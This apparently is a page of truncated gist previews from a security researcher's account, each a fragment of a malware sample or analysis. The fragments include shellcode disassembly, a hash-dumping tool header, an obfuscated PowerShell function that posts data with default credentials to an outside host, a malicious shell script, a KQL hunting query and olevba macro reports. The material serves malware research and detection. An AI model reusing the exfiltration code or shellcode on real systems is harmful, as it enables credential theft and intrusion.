JohnLaTwC

0000000: 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c  LLLLLLLLLLLLLLLL
0000010: 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c  LLLLLLLLLLLLLLLL
0000020: 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c  LLLLLLLLLLLLLLLL
0000030: 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c  LLLLLLLLLLLLLLLL
0000040: 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c  LLLLLLLLLLLLLLLL
0000050: 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c  LLLLLLLLLLLLLLLL
0000060: 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c  LLLLLLLLLLLLLLLL
0000070: 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c  LLLLLLLLLLLLLLLL
0000080: 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c  LLLLLLLLLLLLLLLL
0000090: 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c 4c4c  LLLLLLLLLLLLLLLL

JohnLaTwC

00000000 FC                              CLD
00000001 E882000000                      CALL -FFFFFF78
00000006 60                              PUSHA
00000007 89E5                            MOV EBP,ESP
00000009 31C0                            XOR EAX,EAX
0000000B 648B5030                        MOV EDX,DWORD PTR FS:[EAX+30]
0000000F 8B520C                          MOV EDX,DWORD PTR [EDX+0C]
00000012 8B5214                          MOV EDX,DWORD PTR [EDX+14]
00000015 8B7228                          MOV ESI,DWORD PTR [EDX+28]
00000018 0FB74A26                        MOVZX ECX,WORD PTR [EDX+26]

JohnLaTwC

# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Description: Performs various techniques to dump hashes from the
#              remote machine without executing any agent there.
#              For SAM and LSA Secrets (including cached creds)
#              we try to read as much as we can from the registry

JohnLaTwC

#!/bin/bash
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
#This is the Old-ReBuild Lady job copy
#
#Goal:
# The goal of this campaign is as follows;
# - To keep the internet safe.
# - To keep them hackers from causing real damage to organisations.
# - We know you feel We are a potential threat, well We ain't.

JohnLaTwC

let valid_logons = (OfficeActivity
    | where TimeGenerated > ago(30d)
    | where Operation == 'UserLoggedIn'
    | summarize by ClientIP);
let only_invalid_logons = (OfficeActivity
    | where TimeGenerated > ago(30d)
    | where Operation == 'UserLoginFailed'
    | summarize by ClientIP) 
    | join kind=anti (valid_logons) on ClientIP;
OfficeActivity

JohnLaTwC

function sxuveww( $zgzbjie ){
  $jcavxhj = New-Object System.Net.WebClient;
  $jcavxhj.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
  $jcavxhj.Headers.Add("Content-Type", "application/x-www-form-urlencoded");
  $jcavxhj.Encoding = [System.Text.Encoding]::UTF8;
  try{
    $seezzhbd = $jcavxhj.UploadString( "http://surv.surviveandthriveparenting.com/", "guid=temp_2163694146&" + $zgzbjie );
    return $seezzhbd;
  }catch{};
  return $false;

JohnLaTwC

## uploaded by @JohnLaTwC
## Sample hash: 26f5d965bd75023f0582303e76b513da87eca4f62279d6c7b7f8f7f37b97391f

import subprocess
import re
import binascii
import socket
import struct
import threading
import os

JohnLaTwC

olevba 0.54.2 on Python 3.7.3 - http://decalage.info/python/oletools
===============================================================================
FILE: a8f5b757d2111927731c2c4730ca97a9d4f2c2b6eb9cd80bbb3ff33168bfd740
Type: OpenXML
-------------------------------------------------------------------------------
VBA MACRO ThisWorkbook.cls 
in file: xl/vbaProject.bin - OLE stream: 'VBA/ThisWorkbook'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
(empty macro)
-------------------------------------------------------------------------------

JohnLaTwC

## uploaded by @JohnLaTwC
## thx @MalwareRE
## see https://www.virustotal.com/gui/file/7b69d70e57ea7f560d35218150f59c211b6e3f007c632bffcc56ea9dac4467c4/detection

olevba 0.54.2 on Python 3.7.2 - http://decalage.info/python/oletools
===============================================================================
7b69d70e57ea7f560d35218150f59c211b6e3f007c632bffcc56ea9dac4467c4\7b69d70e57ea7f560d35218150f59c211b6e3f007c632bffcc56ea9dac4467c4
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisOutlookSession.cls 

JohnLaTwC

olevba 0.55.1 on Python 3.7.3 - http://decalage.info/python/oletools
===============================================================================
FILE: 4d09c97c9774c2572a63d38582cb1c1537d734d2cf496099218a14fd842a59dd
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO xlm_macro.txt 
in file: xlm_macro - OLE stream: 'xlm_macro'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
' 0085     14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible
' 0085     11 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible